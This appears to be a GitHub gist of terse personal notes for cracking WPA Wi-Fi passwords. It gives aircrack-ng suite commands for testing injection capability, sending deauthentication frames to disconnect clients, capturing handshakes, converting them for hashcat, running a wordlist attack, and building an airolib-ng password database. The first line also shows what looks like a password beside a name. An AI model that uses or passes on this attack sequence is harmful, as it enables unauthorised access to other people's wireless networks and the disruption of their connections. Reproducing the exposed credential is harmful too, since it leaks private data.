Skip to content

Instantly share code, notes, and snippets.

@DastanIqbal
Created August 26, 2019 09:15
Show Gist options
  • Save DastanIqbal/59a9b0c4db8378c83295e360debbd947 to your computer and use it in GitHub Desktop.
Save DastanIqbal/59a9b0c4db8378c83295e360debbd947 to your computer and use it in GitHub Desktop.
password:Khush:0134308553
ifconfig wlan0 down
aireplay-ng -9 wlan0 ----------> Tell wifi is capable for injection or not
Deauthentication-> aireplay-ng -0 30(send 30 deauth request for unlimmitted 0) -a bssid -c macIdtoDeauth wlan0
airodump-ng -c <channelNo> --bssid <mac router> -w psk wlan0
aircrack-ng -J mypsk psk-01.cap ---> converting to hccap (Hashcat)
hashcat -m(mode) 2500 mypsk.hccap megabeast.txt(worldlist)
create Pasword
airolib-ng PASSWORD --import password '/wordlistpath'
airolib-ng PASSWORD --import essid '/essidpath'
airolib-ng PASSWORD --clean all
airolib-ng PASSWORD --stats
airolib-ng PASSWORD --batch
airolib-ng PASSWORD --verify all
aircrack-ng -r PASSWORD file path
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment